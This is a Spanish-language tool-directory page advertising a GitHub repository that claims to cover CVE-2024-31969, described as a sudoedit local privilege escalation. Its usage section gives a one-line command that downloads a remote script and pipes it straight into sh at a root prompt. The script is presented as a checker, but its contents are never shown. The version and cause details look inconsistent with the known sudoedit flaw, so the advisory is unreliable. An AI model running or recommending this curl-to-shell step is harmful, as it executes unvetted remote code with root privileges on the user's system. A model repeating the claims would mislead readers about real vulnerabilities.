Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-31969 — CVE-2024-31969 es una escalada de privilegios local en sudo cuando se utiliza sudoedit. | Kitploit
Herramientas/GitHubGitHub/kingfakee7/cve-2024-31969
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y Educación
GitHubkingfakee7/cve-2024-31969

CVE-2024-31969

CVE-2024-31969 es una escalada de privilegios local en sudo cuando se utiliza sudoedit.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

📌 CVE-2024-31969

CVE-2024-31969 es una vulnerabilidad de escalada de privilegios local en sudo al usar el comando sudoedit.

Esta vulnerabilidad se introdujo a partir de sudo 1.9.0 debido a la forma incorrecta en que sudoedit validaba las variables de entorno del usuario y la propiedad de los archivos.


📖 Descripción

Una falla introducida en sudo 1.9.0 en la forma en que sudoedit validaba las variables de entorno de los usuarios y la propiedad de los archivos.

Esta vulnerabilidad permite a un usuario local con acceso a sudoedit modificar archivos arbitrarios como root mediante la manipulación de variables de entorno como SUDO_EDITOR, o aprovechando symlinks.


📊 Versiones de Sudo afectadas:

Versión de SudoEstado
1.9.0 → 1.9.15p4🔥 Vulnerable
1.9.15p5 o superior✅ Segura
1.8.x (incluida 1.8.23)❌ No afectada

📦 Instalación y Uso

Ejecute el siguiente comando:

root@kitploit:~
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh

🛠️ Solución / Mitigación

  • Actualice sudo a la versión 1.9.15p5 o posterior.
  • Limite las reglas sudoers que permiten sudoedit a usuarios no root.
  • Utilice una configuración segura de env_keep o env_reset en el archivo /etc/sudoers.

📚 Referencias

  • CVE-2024-31969 en NVD

⚠️ Descargo de responsabilidad

Este repositorio se creó con fines educativos y de documentación de seguridad de sistemas.
Está estrictamente prohibido utilizar esta información para actividades ilegales o sin el permiso por escrito del propietario del sistema.
Cualquier forma de uso indebido queda totalmente fuera de la responsabilidad del creador.

Descargar herramienta